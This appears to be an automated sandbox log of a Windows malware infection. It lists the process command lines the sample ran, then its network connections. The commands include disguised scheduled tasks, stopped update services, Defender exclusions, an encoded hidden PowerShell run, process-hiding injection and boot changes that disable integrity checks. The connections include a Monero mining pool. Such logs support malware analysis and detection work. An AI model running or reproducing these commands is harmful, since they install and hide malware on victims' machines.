C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "15372562661215740005-12544478791981427685-219219477-8605077661879871049-943086376"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 04:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\QrgcvHR.exe\" 3Y /wKsite_idKbr 385119 /S" /V1 /F

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {7E2E3B45-7246-4668-9BC0-CAAE6C21C5B3} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\QrgcvHR.exe

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\QrgcvHR.exe 3Y /wKsite_idKbr 385119 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gqXggzpuy" /SC once /ST 03:46:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gqXggzpuy"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gqXggzpuy"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\wUBDPVxDQVpvNZiy\GxmxQlgq\lmAdWhykFjYNhohl.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\wUBDPVxDQVpvNZiy\GxmxQlgq\lmAdWhykFjYNhohl.wsf"

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 02:55:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\ZQkTMpd.exe\" KS /Qzsite_idPTZ 385119 /S" /V1 /F

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-770366011-11197729931568053727-1493761428634450725936144606-7768676012036437623"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\ZQkTMpd.exe

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\ZQkTMpd.exe KS /Qzsite_idPTZ 385119 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\cbQZoF.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Network

Country Destination Domain Proto
RU 193.233.255.73:80 193.233.255.73 tcp
US 8.8.8.8:53 www.facebook.com udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 accounts.google.com udp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
NL 142.251.36.45:443 accounts.google.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
TR 185.216.70.222:80 tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 facebook.com udp
NL 157.240.201.35:443 facebook.com tcp
NL 157.240.201.35:443 facebook.com tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 fbcdn.net udp
NL 157.240.201.35:443 fbcdn.net tcp
NL 157.240.201.35:443 fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
NL 157.240.201.35:443 fbsbx.com tcp
NL 157.240.201.35:443 fbsbx.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 accounts.youtube.com udp
NL 142.250.179.206:443 accounts.youtube.com tcp
NL 142.250.179.206:443 accounts.youtube.com tcp
US 8.8.8.8:53 play.google.com udp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.71:4341 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
BG 171.22.28.213:80 171.22.28.213 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
RU 85.209.11.85:41140 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
NL 195.123.218.98:80 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
NL 195.123.218.98:80 tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 e28f51ae-893b-443b-a960-03ad84c5fab8.uuid.allstatsin.ru udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.34:80 host-host-file8.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
DE 31.192.237.75:80 tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
NL 194.169.175.235:42691 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 31.192.237.75:80 tcp
US 8.8.8.8:53 datasheet.fun udp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
NL 51.15.65.182:14433 xmr-eu1.nanopool.org tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
FR 51.255.34.118:14433 xmr-eu1.nanopool.org tcp
